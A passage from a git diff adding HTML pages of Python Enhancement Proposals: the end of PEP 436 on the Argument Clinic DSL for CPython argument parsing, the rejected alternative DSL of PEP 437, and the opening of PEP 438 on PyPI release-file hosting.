  • +
  • speeding up argument parsing with improvements to the +generated code.
  • +
+
+
+

DSL Syntax Summary

+

The Argument Clinic DSL is specified as a comment embedded in a C +file, as follows. The “Example” column on the right shows you sample +input to the Argument Clinic DSL, and the “Section” column on the left +specifies what each line represents in turn.

+

Argument Clinic’s DSL syntax mirrors the Python def +statement, lending it some familiarity to Python core developers.

+
+-----------------------+-----------------------------------------------------------------+
+| Section               | Example                                                         |
++-----------------------+-----------------------------------------------------------------+
+| Clinic DSL start      | /*[clinic]                                                      |
+| Module declaration    | module module_name                                              |
+| Class declaration     | class module_name.class_name                                    |
+| Function declaration  | module_name.function_name  -> return_annotation                 |
+| Parameter declaration |       name : converter(param=value)                             |
+| Parameter docstring   |           Lorem ipsum dolor sit amet, consectetur               |
+|                       |           adipisicing elit, sed do eiusmod tempor               |
+| Function docstring    | Lorem ipsum dolor sit amet, consectetur adipisicing             |
+|                       | elit, sed do eiusmod tempor incididunt ut labore et             |
+| Clinic DSL end        | [clinic]*/                                                      |
+| Clinic output         | ...                                                             |
+| Clinic output end     | /*[clinic end output:<checksum>]*/                              |
++-----------------------+-----------------------------------------------------------------+
+
+
+

To give some flavor of the proposed DSL syntax, here are some sample Clinic +code blocks. This first block reflects the normally preferred style, including +blank lines between parameters and per-argument docstrings. +It also includes a user-defined converter (path_t) created +locally:

+
/*[clinic]
+os.stat as os_stat_fn -> stat result
+
+   path: path_t(allow_fd=1)
+       Path to be examined; can be string, bytes, or open-file-descriptor int.
+
+   *
+
+   dir_fd: OS_STAT_DIR_FD_CONVERTER = DEFAULT_DIR_FD
+       If not None, it should be a file descriptor open to a directory,
+       and path should be a relative string; path will then be relative to
+       that directory.
+
+   follow_symlinks: bool = True
+       If False, and the last element of the path is a symbolic link,
+       stat will examine the symbolic link itself instead of the file
+       the link points to.
+
+Perform a stat system call on the given path.
+
+{parameters}
+
+dir_fd and follow_symlinks may not be implemented
+  on your platform.  If they are unavailable, using them will raise a
+  NotImplementedError.
+
+It's an error to use dir_fd or follow_symlinks when specifying path as
+  an open file descriptor.
+
+[clinic]*/
+
+
+

This second example shows a minimal Clinic code block, omitting all +parameter docstrings and non-significant blank lines:

+
/*[clinic]
+os.access
+   path: path
+   mode: int
+   *
+   dir_fd: OS_ACCESS_DIR_FD_CONVERTER = 1
+   effective_ids: bool = False
+   follow_symlinks: bool = True
+Use the real uid/gid to test for access to a path.
+Returns True if granted, False otherwise.
+
+{parameters}
+
+dir_fd, effective_ids, and follow_symlinks may not be implemented
+  on your platform.  If they are unavailable, using them will raise a
+  NotImplementedError.
+
+Note that most operations will use the effective uid/gid, therefore this
+  routine can be used in a suid/sgid environment to test if the invoking user
+  has the specified access to the path.
+
+[clinic]*/
+
+
+

This final example shows a Clinic code block handling groups of +optional parameters, including parameters on the left:

+
/*[clinic]
+curses.window.addch
+
+   [
+   y: int
+     Y-coordinate.
+
+   x: int
+     X-coordinate.
+   ]
+
+   ch: char
+     Character to add.
+
+   [
+   attr: long
+     Attributes for the character.
+   ]
+
+   /
+
+Paint character ch at (y, x) with attributes attr,
+overwriting any character previously painter at that location.
+By default, the character position and attributes are the
+current settings for the window object.
+[clinic]*/
+
+
+
+

General Behavior Of the Argument Clinic DSL

+

All lines support # as a line comment delimiter except +docstrings. Blank lines are always ignored.

+

As in Python itself, leading whitespace is significant in the Argument +Clinic DSL. The first line of the “function” section is the +function declaration. Indented lines below the function declaration +declare parameters, one per line; lines below those that are indented even +further are per-parameter docstrings. Finally, the first line dedented +back to column 0 ends parameter declarations and starts the function docstring.

+

Parameter docstrings are optional; function docstrings are not. +Functions that specify no arguments may simply specify the function +declaration followed by the docstring.

+
+
+

Module and Class Declarations

+

When a C file implements a module or class, this should be declared to +Clinic. The syntax is simple:

+
module module_name
+
+
+

or

+
class module_name.class_name
+
+
+

(Note that these are not actually special syntax; they are implemented +as Directives.)

+

The module name or class name should always be the full dotted path +from the top-level module. Nested modules and classes are supported.

+
+
+

Function Declaration

+

The full form of the function declaration is as follows:

+
dotted.name [ as legal_c_id ] [ -> return_annotation ]
+
+
+

The dotted name should be the full name of the function, starting +with the highest-level package (e.g. “os.stat” or “curses.window.addch”).

+

The “as legal_c_id” syntax is optional. +Argument Clinic uses the name of the function to create the names of +the generated C functions. In some circumstances, the generated name +may collide with other global names in the C program’s namespace. +The “as legal_c_id” syntax allows you to override the generated name +with your own; substitute “legal_c_id” with any legal C identifier. +If skipped, the “as” keyword must also be omitted.

+

The return annotation is also optional. If skipped, the arrow (”->”) +must also be omitted. If specified, the value for the return annotation +must be compatible with ast.literal_eval, and it is interpreted as +a return converter.
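A quick sketch of what “compatible with ast.literal_eval” admits (abbreviated output):

>>> import ast
>>> ast.literal_eval("'stat result'")     # a literal: accepted
'stat result'
>>> ast.literal_eval("os.stat_result")    # a name lookup: rejected
Traceback (most recent call last):
  ...
ValueError: malformed node or string: ...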

+
+
+

Parameter Declaration

+

The full form of the parameter declaration line as follows:

+
name: converter [ (parameter=value [, parameter2=value2]) ] [ = default]
+
+
+

The “name” must be a legal C identifier. Whitespace is permitted between +the name and the colon (though this is not the preferred style). Whitespace +is permitted (and encouraged) between the colon and the converter.

+

The “converter” is the name of one of the “converter functions” registered +with Argument Clinic. Clinic will ship with a number of built-in converters; +new converters can also be added dynamically. In choosing a converter, you +are automatically constraining what Python types are permitted on the input, +and specifying what type the output variable (or variables) will be. Although +many of the converters will resemble the names of C types or perhaps Python +types, the name of a converter may be any legal Python identifier.

+

If the converter is followed by parentheses, these parentheses enclose +parameters to the conversion function. The syntax mirrors providing arguments +in a Python function call: the parameters must always be named, as if they were +“keyword-only parameters”, and the values provided for the parameters will +syntactically resemble Python literal values. These parameters are always +optional, permitting all conversion functions to be called without +any parameters. In this case, you may also omit the parentheses entirely; +this is always equivalent to specifying empty parentheses. The values +supplied for these parameters must be compatible with ast.literal_eval.

+

The “default” is a Python literal value. Default values are optional; +if not specified you must omit the equals sign too. Parameters which +don’t have a default are implicitly required. The default value is +dynamically assigned, “live” in the generated C code, and although +it’s specified as a Python value, it’s translated into a native C +value in the generated C code. Few default values are permitted, +owing to this manual translation step.

+

If this were a Python function declaration, a parameter declaration +would be delimited by either a trailing comma or an ending parenthesis. +However, Argument Clinic uses neither; parameter declarations are +delimited by a newline. A trailing comma or right parenthesis is not +permitted.

+

The first parameter declaration establishes the indent for all parameter +declarations in a particular Clinic code block. All subsequent parameters +must be indented to the same level.

+
+
+

Legacy Converters

+

For convenience’s sake in converting existing code to Argument Clinic, +Clinic provides a set of legacy converters that match PyArg_ParseTuple +format units. They are specified as a C string containing the format +unit. For example, to specify a parameter “foo” as taking a Python +“int” and emitting a C int, you could specify:

+
foo : "i"
+
+
+

(To more closely resemble a C string, these must always use double quotes.)

+

Although these resemble PyArg_ParseTuple format units, no guarantee is +made that the implementation will call a PyArg_Parse function for parsing.

+

This syntax does not support parameters. Therefore, it doesn’t support any +of the format units that require input parameters ("O!", "O&", "es", "es#", +"et", "et#"). Parameters requiring one of these conversions cannot use the +legacy syntax. (You may still, however, supply a default value.)

+
+
+

Parameter Docstrings

+

All lines that appear below and are indented further than a parameter declaration +are the docstring for that parameter. All such lines are “dedented” until the +first line is flush left.

+
+
+

Special Syntax For Parameter Lines

+

There are four special symbols that may be used in the parameter section. Each +of these must appear on a line by itself, indented to the same level as parameter +declarations. The four symbols are:

+
+
*
Establishes that all subsequent parameters are keyword-only.
+
[
Establishes the start of an optional “group” of parameters. +Note that “groups” may nest inside other “groups”. +See Functions With Positional-Only Parameters below. +Note that currently [ is only legal for use in functions +where all parameters are marked positional-only, see +/ below.
+
]
Ends an optional “group” of parameters.
+
/
Establishes that all the preceding arguments are +positional-only. For now, Argument Clinic does not +support functions with both positional-only and +non-positional-only arguments. Therefore: if / +is specified for a function, it must currently always +be after the last parameter. Also, Argument Clinic +does not currently support default values for +positional-only parameters.
+
+

(The semantics of / follow a syntax for positional-only +parameters in Python once proposed by Guido. [5] )

+
+
+

Function Docstring

+

The first line with no leading whitespace after the function declaration is the +first line of the function docstring. All subsequent lines of the Clinic block +are considered part of the docstring, and their leading whitespace is preserved.

+

If the string {parameters} appears on a line by itself inside the function +docstring, Argument Clinic will insert a list of all parameters that have +docstrings, each such parameter followed by its docstring. The name of the +parameter is on a line by itself; the docstring starts on a subsequent line, +and all lines of the docstring are indented by two spaces. (Parameters with +no per-parameter docstring are suppressed.) The entire list is indented by the +leading whitespace that appeared before the {parameters} token.

+

If the string {parameters} doesn’t appear in the docstring, Argument Clinic +will append one to the end of the docstring, inserting a blank line above it if +the docstring does not end with a blank line, and with the parameter list at +column 0.

+
+
+

Converters

+

Argument Clinic contains a pre-initialized registry of converter functions. +Example converter functions:

+
+
int
Accepts a Python object implementing __int__; emits a C int.
+
byte
Accepts a Python int; emits an unsigned char. The integer +must be in the range [0, 256).
+
str
Accepts a Python str object; emits a C char *. Automatically +encodes the string using the ascii codec.
+
PyObject
Accepts any object; emits a C PyObject * without any conversion.
+
+

All converters accept the following parameters:

+
+
doc_default
The Python value to use in place of the parameter’s actual default +in Python contexts. In other words: when specified, this value will +be used for the parameter’s default in the docstring, and in the +Signature. (TBD alternative semantics: If the string is a valid +Python expression which can be rendered into a Python value using +eval(), then the result of eval() on it will be used as the +default in the Signature.) Ignored if there is no default.
+
required
Normally any parameter that has a default value is automatically +optional. A parameter that has “required” set will be considered +required (non-optional) even if it has a default value. The +generated documentation will also not show any default value.
+
+

Additionally, converters may accept one or more of these optional +parameters, on an individual basis:

+
+
annotation
Explicitly specifies the per-parameter annotation for this +parameter. Normally it’s the responsibility of the conversion +function to generate the annotation (if any).
+
bitwise
For converters that accept unsigned integers. If the Python integer +passed in is signed, copy the bits directly even if it is negative.
+
encoding
For converters that accept str. Encoding to use when encoding a +Unicode string to a char *.
+
immutable
Only accept immutable values.
+
length
For converters that accept iterable types. Requests that the converter +also emit the length of the iterable, passed in to the _impl function +in a Py_ssize_t variable; its name will be this +parameter’s name appended with “_length”.
+
nullable
This converter normally does not accept None, but in this case +it should. If None is supplied on the Python side, the equivalent +C argument will be NULL. (The _impl argument emitted by this +converter will presumably be a pointer type.)
+
types
A list of strings representing acceptable Python types for this object. +There are also four strings which represent Python protocols:
    +
  • “buffer”
  • +
  • “mapping”
  • +
  • “number”
  • +
  • “sequence”
  • +
+
+
zeroes
For converters that accept string types. The converted value should +be allowed to have embedded zeroes.
+
+
+
+

Return Converters

+

A return converter conceptually performs the inverse operation of +a converter: it converts a native C value into its equivalent Python +value.

+
+
+

Directives

+

Argument Clinic also permits “directives” in Clinic code blocks. +Directives are similar to pragmas in C; they are statements +that modify Argument Clinic’s behavior.

+

The format of a directive is as follows:

+
directive_name [argument [second_argument [ ... ]]]
+
+
+

Directives only take positional arguments.

+

A Clinic code block must contain either one or more directives, +or a function declaration. It may contain both, in which +case all directives must come before the function declaration.

+

Internally, directives map directly to Python callables. +The directive’s arguments are passed to the callable +as positional arguments of type str.

+

Example possible directives include the production, +suppression, or redirection of Clinic output. Also, the +“module” and “class” keywords are implemented +as directives in the prototype.

+
+
+
+

Python Code

+

Argument Clinic also permits embedding Python code inside C files, +which is executed in-place when Argument Clinic processes the file. +Embedded code looks like this:

+
/*[python]
+
+# this is python code!
+print("/" + "* Hello world! *" + "/")
+
+[python]*/
+/* Hello world! */
+/*[python end:da39a3ee5e6b4b0d3255bfef95601890afd80709]*/
+
+
+

The "/* Hello world! */" line above was generated by running the Python +code in the preceding comment.

+

Any Python code is valid. Python code sections in Argument Clinic can +also be used to directly interact with Clinic; see +Argument Clinic Programmatic Interfaces.

+
+
+

Output

+

Argument Clinic writes its output inline in the C file, immediately +after the section of Clinic code. For “python” sections, the output +is everything printed using builtins.print. For “clinic” +sections, the output is valid C code, including:

+
    +
  • a #define providing the correct methoddef structure for the +function
  • +
  • a prototype for the “impl” function – this is what you’ll write +to implement this function
  • +
  • a function that handles all argument processing, which calls your +“impl” function
  • +
  • the definition line of the “impl” function
  • +
  • and a comment indicating the end of output.
  • +
+

The intention is that you write the body of your impl function immediately +after the output – as in, you write a left-curly-brace immediately after +the end-of-output comment and implement the builtin in the body there. +(It’s a bit strange at first, but oddly convenient.)

+

Argument Clinic will define the parameters of the impl function for +you. The function will take the “self” parameter passed in +originally, all the parameters you define, and possibly some extra +generated parameters (“length” parameters; also “group” parameters, +see next section).

+

Argument Clinic also writes a checksum for the output section. This +is a valuable safety feature: if you modify the output by hand, Clinic +will notice that the checksum doesn’t match, and will refuse to +overwrite the file. (You can force Clinic to overwrite with the +“-f” command-line argument; Clinic will also ignore the checksums +when using the “-o” command-line argument.)
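A conceptual sketch of the checksum idea, not Clinic’s actual code; SHA-1 is an assumption here, inferred from the sample end-marker shown earlier in this PEP, which is the SHA-1 digest of an empty string:

import hashlib

def output_checksum(generated: str) -> str:
    # hash the generated block; if a human edits the output by hand,
    # the stored checksum no longer matches and the tool refuses to
    # overwrite the file
    return hashlib.sha1(generated.encode('utf-8')).hexdigest()

assert output_checksum('') == 'da39a3ee5e6b4b0d3255bfef95601890afd80709'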

+

Finally, Argument Clinic can also emit the boilerplate definition +of the PyMethodDef array for the defined classes and modules.

+
+
+

Functions With Positional-Only Parameters

+

A significant fraction of Python builtins implemented in C use the +older positional-only API for processing arguments +(PyArg_ParseTuple()). In some instances, these builtins parse +their arguments differently based on how many arguments were passed +in. This can provide some bewildering flexibility: there may be +groups of optional parameters, which must either all be specified or +none specified. And occasionally these groups are on the left! (A +representative example: curses.window.addch().)

+

Argument Clinic supports these legacy use-cases by allowing you to +specify parameters in groups. Each optional group of parameters +is marked with square brackets. Note that these groups are permitted +on the right or left of any required parameters!

+

The impl function generated by Clinic will add an extra parameter for +every group, “int group_{left|right}_<x>”, where x is a monotonically +increasing number assigned to each group as it builds away from the +required arguments. This argument will be nonzero if the group was +specified on this call, and zero if it was not.

+

Note that when operating in this mode, you cannot specify default +arguments.

+

Also, note that it’s possible to specify a set of groups to a function +such that there are several valid mappings from the number of +arguments to a valid set of groups. If this happens, Clinic will abort +with an error message. This should not be a problem, as +positional-only operation is only intended for legacy use cases, and +all the legacy functions using this quirky behavior have unambiguous +mappings.

+
+
+

Current Status

+

As of this writing, there is a working prototype implementation of +Argument Clinic available online (though the syntax may be out of date +as you read this). [6] The prototype generates code using the +existing PyArg_Parse APIs. It supports translating to all current +format units except the mysterious "w*". Sample functions using +Argument Clinic exercise all major features, including positional-only +argument parsing.

+
+

Argument Clinic Programmatic Interfaces

+

The prototype also currently provides an experimental extension +mechanism, allowing adding support for new types on-the-fly. See +Modules/posixmodule.c in the prototype for an example of its use.

+

In the future, Argument Clinic is expected to be automatable enough +to allow querying, modification, or outright new construction of +function declarations through Python code. It may even permit +dynamically adding your own custom DSL!

+
+
+
+

Notes / TBD

+
    +
  • The API for supplying inspect.Signature metadata for builtins is +currently under discussion. Argument Clinic will add support for +the prototype when it becomes viable.
  • +
  • Alyssa Coghlan suggests that we a) only support at most one left-optional +group per function, and b) in the face of ambiguity, prefer the left +group over the right group. This would solve all our existing use cases +including range().
  • +
  • Optimally we’d want Argument Clinic run automatically as part of the +normal Python build process. But this presents a bootstrapping problem; +if you don’t have a system Python 3, you need a Python 3 executable to +build Python 3. I’m sure this is a solvable problem, but I don’t know +what the best solution might be. (Supporting this will also require +a parallel solution for Windows.)
  • +
  • On a related note: inspect.Signature has no way of representing +blocks of arguments, like the left-optional block of y and x +for curses.window.addch. How far are we going to go in supporting +this admittedly aberrant parameter paradigm?
  • +
  • During the PyCon US 2013 Language Summit, there was discussion of having +Argument Clinic also generate the actual documentation (in ReST, processed +by Sphinx) for the function. The logistics of this are TBD, but it would +require that the docstrings be written in ReST, and require that Python +ship a ReST -> ascii converter. It would be best to come to a decision +about this before we begin any large-scale conversion of the CPython +source tree to using Clinic.
  • +
  • Guido proposed having the “function docstring” be hand-written inline, +in the middle of the output, something like this:
    /*[clinic]
    +  ... prototype and parameters (including parameter docstrings) go here
    +[clinic]*/
    +... some output ...
    +/*[clinic docstring start]*/
    +... hand-edited function docstring goes here   <-- you edit this by hand!
    +/*[clinic docstring end]*/
    +... more output
    +/*[clinic output end]*/
    +
    +
    +

    I tried it this way and don’t like it – I think it’s clumsy. I +prefer that everything you write goes in one place, rather than +having an island of hand-edited stuff in the middle of the DSL +output.

    +
  • +
  • Argument Clinic does not support automatic tuple unpacking +(the “(OOO)” style format string for PyArg_ParseTuple().)
  • +
  • Argument Clinic removes some dynamism / flexibility. With +PyArg_ParseTuple() one could theoretically pass in different +encodings at runtime for the “es”/”et” format units. +AFAICT CPython doesn’t do this itself, however it’s possible +external users might do this. (Trivia: there are no uses of +“es” exercised by regrtest, and all the uses of “et” +exercised are in socketmodule.c, except for one in _ssl.c. +They’re all static, specifying the encoding "idna".)
  • +
+
+
+

Acknowledgements

+

The PEP author wishes to thank Ned Batchelder for permission to +shamelessly rip off his clever design for Cog–“my favorite tool +that I’ve never gotten to use”. Thanks also to everyone who provided +feedback on the [bugtracker issue] and on python-dev. Special thanks +to Alyssa (Nick) Coghlan and Guido van Rossum for a rousing two-hour in-person +deep dive on the topic at PyCon US 2013.

+
+
+

References

+ + +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0436.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0437/index.html b/pep-0437/index.html new file mode 100644 index 00000000000..00687528e3d --- /dev/null +++ b/pep-0437/index.html @@ -0,0 +1,491 @@ + + + + + + + + PEP 437 – A DSL for specifying signatures, annotations and argument converters | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 437 – A DSL for specifying signatures, annotations and argument converters

+
+
Author:
+
Stefan Krah <skrah at bytereef.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
11-Mar-2013
+
Python-Version:
+
3.4
+
Post-History:
+

+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

The Python C-API currently has no mechanism for specifying and auto-generating +function signatures, annotations or custom argument converters.

+

There are several possible approaches to the problem. Cython uses cdef +definitions in .pyx files to generate the required information. However, +CPython’s C-API functions often require additional initialization and +cleanup snippets that would be hard to specify in a cdef.

+

PEP 436 proposes a domain specific language (DSL) enclosed in C comments +that largely resembles a per-parameter configuration file. A preprocessor +reads the comment and emits an argument parsing function, docstrings and +a header for the function that utilizes the results of the parsing step.

+

The latter function is subsequently referred to as the implementation +function.

+
+
+

Rejection Notice

+

This PEP was rejected by Guido van Rossum at PyCon US 2013. However, several +of the specific issues raised by this PEP were taken into account when +designing the second iteration of the PEP 436 DSL.

+
+
+

Rationale

+

Opinions differ regarding the suitability of the PEP 436 DSL in the context +of a C file. This PEP proposes an alternative DSL. The specific issues with +PEP 436 that spurred the counter proposal will be explained in the final +section of this PEP.

+
+
+

Scope

+

The PEP focuses exclusively on the DSL. Topics like the output locations of +docstrings or the generated code are outside the scope of this PEP.

+

It is however vital that the DSL is suitable for generating custom argument +parsers, a feature that is already implemented in Cython. Therefore, one of +the goals of this PEP is to keep the DSL close to existing solutions, thus +facilitating a possible inclusion of the relevant parts of Cython into the +CPython source tree.

+
+
+

DSL overview

+
+

Type safety and annotations

+

A conversion from a Python value to a C value is fully defined by the type of +the converter function. The PyArg_Parse* family of functions accepts +custom converters in addition to the well-known default converters “i”, +“f”, etc.

+

This PEP views the default converters as abstract functions, regardless +of how they are actually implemented.

+
+
+

Include/converters.h

+

Converter functions must be forward-declared. All converter functions +shall be entered into the file Include/converters.h. The file is read +by the preprocessor prior to translating .c files. This is an excerpt:

+
/*[converter]
+##### Default converters #####
+"s":  str                                -> const char *res;
+"s*": [str, bytes, bytearray, rw_buffer] -> Py_buffer &res;
+[...]
+"es#": str -> (const char *res_encoding, char **res, Py_ssize_t *res_length);
+[...]
+##### Custom converters #####
+path_converter:           [str, bytes, int]  -> path_t &res;
+OS_STAT_DIR_FD_CONVERTER: [int, None]        -> int res;
+[converter_end]*/
+
+
+

Converters are specified by their name, Python input type(s) and C output +type(s). Default converters must have quoted names, custom converters must +have regular names. A Python type is given by its name. If a function accepts +multiple Python types, the set is written in list form.

+

Since the default converters may have multiple implicit return values, +the C output type(s) are written according to the following convention:

+

The main return value must be named res. This is a placeholder for +the actual variable name given later in the DSL. Additional implicit +return values must be prefixed by res_.

+

By default the variables are passed by value to the implementation function. +If the address should be passed instead, res must be prefixed with an +ampersand.

+

Additional declarations may be placed into .c files. Duplicate declarations +are allowed as long as the function types are identical.

+

It is encouraged to declare custom converter types a second time right +above the converter function definition. The preprocessor will then catch +any mismatch between the declarations.

+

In order to keep the converter complexity manageable, PY_SSIZE_T_CLEAN will +be deprecated and Py_ssize_t will be assumed for all length arguments.

+

TBD: Make a list of fantasy types like rw_buffer.

+
+
+

Function specifications

+
+

Keyword arguments

+

This example contains the definition of os.stat. The individual sections will +be explained in detail. Grammatically, the whole define block consists of a +function specification and an output section. The function specification in +turn consists of a declaration section, an optional C-declaration section and +an optional cleanup code section. Sections within the function specification +are separated in yacc style by ‘%%’:

+
/*[define posix_stat]
+def os.stat(path: path_converter, *, dir_fd: OS_STAT_DIR_FD_CONVERTER = None,
+            follow_symlinks: "p" = True) -> os.stat_result: pass
+%%
+path_t path = PATH_T_INITIALIZE("stat", 0, 1);
+int dir_fd = DEFAULT_DIR_FD;
+int follow_symlinks = 1;
+%%
+path_cleanup(&path);
+[define_end]*/
+
+<literal C output>
+
+/*[define_output_end]*/
+
+
+
+
Define block
+

The function specification block starts with a /*[define token, followed +by an optional C function name, followed by a right bracket. If the C function +name is not given, it is generated from the declaration name. In the example, +omitting the name posix_stat would result in a C function name of os_stat.

+
+
+
Declaration
+

The required declaration is (almost) a valid Python function definition. The +‘def’ keyword and the function body are redundant, but the author of this PEP +finds the definition more readable if they are present.

+

The function name may be a path instead of a plain identifier. Each argument +is annotated with the name of the converter function that will be applied to it.

+

Default values are given in the usual Python manner and may be any valid +Python expression.

+

The return value may be any Python expression. Usually it will be the name +of an object, but alternative return values could be specified in list form.

+
+
+
C-declarations
+

This optional section contains C variable declarations. Since the converter +functions have been declared beforehand, the preprocessor can type-check +the declarations.

+
+
+
Cleanup
+

The optional cleanup section contains literal C code that will be inserted +unmodified after the implementation function.

+
+
+
Output
+

The output section contains the code emitted by the preprocessor.

+
+
+
+

Positional-only arguments

+

Functions that do not take keyword arguments are indicated by the presence +of the slash special parameter:

+
/*[define stat_float_times]
+def os.stat_float_times(/, newval: "i") -> os.stat_result: pass
+%%
+int newval = -1;
+[define_end]*/
+
+
+

The preprocessor translates this definition to a PyArg_ParseTuple() call. +All arguments to the right of the slash are optional arguments.

+
+
+

Left and right optional arguments

+

Some legacy functions contain optional argument groups both to the left and right of a central parameter. It is debatable whether a new tool should support such functions. For completeness’ sake, this is the proposed syntax:

+
/*[define]
+def curses.window.addch(y: "i", x: "i", ch: "O", attr: "l") -> None: pass
+where groups = [[ch], [ch, attr], [y, x, ch], [y, x, ch, attr]]
+[define_end]*/
+
+
+

Here ch is the central parameter, attr can optionally be added on the +right, and the group [y, x] can optionally be added on the left.

+

Essentially the rule is that all ordered combinations of the central +parameter and the optional groups must be possible such that no two +combinations have the same length.

+

This is concisely expressed by putting the central parameter first in the list and subsequently adding the optional argument groups to the left and right.
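To make the rule concrete, here is a short Python check (not part of the PEP’s tooling) over the groups from the curses.window.addch example above; dispatching on argument count is only unambiguous if no two combinations share a length:

groups = [["ch"], ["ch", "attr"], ["y", "x", "ch"], ["y", "x", "ch", "attr"]]

lengths = [len(group) for group in groups]
assert len(lengths) == len(set(lengths)), "two signatures share an argument count"
print(sorted(lengths))  # [1, 2, 3, 4] -> dispatch by argument count is well defined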

+
+
+
+
+

Flexibility in formatting

+

If the above os.stat example is considered too compact, it can easily be +formatted this way:

+
/*[define posix_stat]
+def os.stat(path: path_converter,
+            *,
+            dir_fd: OS_STAT_DIR_FD_CONVERTER = None,
+            follow_symlinks: "p" = True)
+-> os.stat_result: pass
+%%
+path_t path = PATH_T_INITIALIZE("stat", 0, 1);
+int dir_fd = DEFAULT_DIR_FD;
+int follow_symlinks = 1;
+%%
+path_cleanup(&path);
+[define_end]*/
+
+<literal C output>
+
+/*[define_output_end]*/
+
+
+
+
+

Benefits of a compact notation

+

The advantages of a concise notation are especially obvious when a large +number of parameters is involved. The argument parsing part of +_posixsubprocess.fork_exec is fully specified by this definition:

+
/*[define subprocess_fork_exec]
+def _posixsubprocess.fork_exec(
+    process_args: "O", executable_list: "O",
+    close_fds: "p", py_fds_to_keep: "O",
+    cwd_obj: "O", env_list: "O",
+    p2cread: "i", p2cwrite: "i", c2pread: "i", c2pwrite: "i",
+    errread: "i", errwrite: "i", errpipe_read: "i", errpipe_write: "i",
+    restore_signals: "i", call_setsid: "i", preexec_fn: "i", /) -> int: pass
+[define_end]*/
+
+
+

Note that the preprocess tool currently emits a redundant C-declaration +section for this example, so the output is longer than necessary.

+
+
+

Easy validation of the definition

+

How can an inexperienced user validate a definition like os.stat? Simply +by changing os.stat to os_stat, defining missing converters and pasting +the definition into the Python interactive interpreter!

+

In fact, a converters.py module could be auto-generated from converters.h.
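As a hedged sketch of that trick, the converter stand-ins below are placeholders rather than the real entries from converters.h:

# Stand-ins for the converters that a generated converters.py would provide.
path_converter = "path_t"                  # placeholder
OS_STAT_DIR_FD_CONVERTER = "int"           # placeholder

class os:                                  # fake namespace so os.stat_result resolves
    stat_result = object()

# The declaration from the define block, with os.stat renamed to os_stat;
# if Python accepts this def statement, the declaration is syntactically valid.
def os_stat(path: path_converter, *, dir_fd: OS_STAT_DIR_FD_CONVERTER = None,
            follow_symlinks: "p" = True) -> os.stat_result: pass

print("declaration accepted")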

+
+
+

Reference implementation

+

A reference implementation is available at issue 16612. Since this PEP +was written under time constraints and the author is unfamiliar with the +PLY toolchain, the software is written in Standard ML and utilizes the +ml-yacc/ml-lex toolchain.

+

The grammar is conflict-free and available in ml-yacc readable BNF form.

+

Two tools are available:

+
    +
  • printsemant reads a converter header and a .c file and dumps +the semantically checked parse tree to stdout.
  • +
  • preprocess reads a converter header and a .c file and dumps +the preprocessed .c file to stdout.
  • +
+

Known deficiencies:

+
    +
• The Python ‘test’ expression is not semantically checked. The syntax, however, is checked, since it is part of the grammar.
  • +
  • The lexer does not handle triple quoted strings.
  • +
  • C declarations are parsed in a primitive way. The final implementation +should utilize ‘declarator’ and ‘init-declarator’ from the C grammar.
  • +
  • The preprocess tool does not emit code for the left-and-right optional +arguments case. The printsemant tool can deal with this case.
  • +
  • Since the preprocess tool generates the output from the parse +tree, the original indentation of the define block is lost.
  • +
+
+
+

Grammar

+
+
TBD: The grammar exists in ml-yacc readable form, but should probably be +included here in EBNF notation.
+
+
+

Comparison with PEP 436

+

The author of this PEP has the following concerns about the DSL proposed +in PEP 436:

+
    +
• The whitespace-sensitive, configuration-file-like syntax looks out of place in a C file.
  • +
  • The structure of the function definition gets lost in the per-parameter +specifications. Keywords like positional-only, required and keyword-only +are scattered across too many different places.

    By contrast, in the alternative DSL the structure of the function +definition can be understood at a single glance.

    +
  • +
  • The PEP 436 DSL has 14 documented flags and at least one undocumented +(allow_fd) flag. Figuring out which of the 2**15 possible combinations +are valid places an unnecessary burden on the user.

    Experience with the PEP 3118 buffer flags has shown that sorting out +(and exhaustively testing!) valid combinations is an extremely tedious +task. The PEP 3118 flags are still not well understood by many people.

    +

    By contrast, the alternative DSL has a central file Include/converters.h +that can be quickly searched for the desired converter. Many of the +converters are already known, perhaps even memorized by people (due +to frequent use).

    +
  • +
  • The PEP 436 DSL allows too much freedom. Types can apparently be omitted, +the preprocessor accepts (and ignores) unknown keywords, sometimes adding +white space after a docstring results in an assertion error.

    The alternative DSL on the other hand allows no such freedoms. Omitting +converter or return value annotations is plainly a syntax error. The +LALR(1) grammar is unambiguous and specified for the complete translation +unit.

    +
  • +
+
+ +
+

References and Footnotes

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0437.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0438/index.html new file mode 100644 index 00000000000..d010951efdb --- /dev/null +++ b/pep-0438/index.html @@ -0,0 +1,577 @@
PEP 438 – Transitioning to release-file hosting on PyPI | peps.python.org
+
+


+ + +
+
+
+

PEP 438 – Transitioning to release-file hosting on PyPI

+
+
Author:
+
Holger Krekel <holger at merlinux.eu>, Carl Meyer <carl at oddbird.net>
+
BDFL-Delegate:
+
Richard Jones <richard at python.org>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Superseded
+
Type:
+
Process
+
Topic:
+
Packaging
+
Created:
+
15-Mar-2013
+
Post-History:
+
19-May-2013
+
Superseded-By:
+
470
+
Resolution:
+
Distutils-SIG message
+
+
+
+
+
+

Abstract

+

This PEP proposes a backward-compatible two-phase transition process +to speed up, simplify and robustify installing from the +pypi.python.org (PyPI) package index. To ease the transition and +minimize client-side friction, no changes to distutils or existing +installation tools are required in order to benefit from the first +transition phase, which will result in faster, more reliable installs +for most existing packages.

+

The first transition phase implements easy and explicit means for a +package maintainer to control which release file links are served to +present-day installation tools. The first phase also includes the +implementation of analysis tools for present-day packages, to support +communication with package maintainers and the automated setting of +default modes for controlling release file links. The first phase +also will default newly-registered projects on PyPI to only serve +links to release files which were uploaded to PyPI.

+

The second transition phase concerns end-user installation tools, +which shall default to only install release files that are hosted on +PyPI and tell the user if external release files exist, offering a +choice to automatically use those external files. External release +files shall in the future be registered together with a checksum +hash so that installation tools can verify the integrity of the +eventual download (PyPI-hosted release files always carry such +a checksum).

+

